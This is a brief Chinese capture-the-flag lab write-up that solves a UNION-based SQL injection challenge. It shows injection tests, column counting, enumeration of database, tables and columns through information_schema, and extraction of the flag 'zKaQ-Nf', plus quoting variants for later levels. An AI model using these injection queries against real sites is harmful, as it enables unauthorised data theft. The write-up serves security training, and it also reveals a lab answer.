靶场:传送门
1、验证是否可以“sql注入”
#SQL1:有返回
select * from user where id=1 and 1=1
#SQL2:无返回
select * from user where id=1 and 1=2
2、验证返回字段的数量:“3”
#SQL1:无返回
select * from user where id=1
union select 1 order by 2
#SQL2:无返回
select * from user where id=1
union select 1,2 order by 2
#SQL3:有返回
select * from user where id=1
union select 1,2,3 order by 2
3、获取数据库名称:“error”,版本号:“5.6.47”
select *from user where id=1
union select 1,database(),version() order by 2
4、获取数据库“error”下,所有表的名称:“error_flag,user”
select *from user where id=1
union select 1,
(select group_concat(table_name)
from information_schema.tables
where table_schema = 'error'
),3
order by 2
5、获取数据库表“error_flag”下,所有字段的名称:“Id,flag”
select *from user where id=1
union select 1,
(select group_concat(column_name)
from information_schema.columns
where table_name = 'error_flag'
),3
order by 2
6、获取flag:zKaQ-Nf
select *from user where id=1
union select 1, (select flag from error_flag limit 1),3
order by 3
告知:Pass-02,Pass-03,Pass-04 与Pass-01考点相同,注意闭合。
不同之处:
pass-01:id = 1
pass-02:id = ‘1’
pass-03:id = (‘1’)
pass-04:id= (“1”)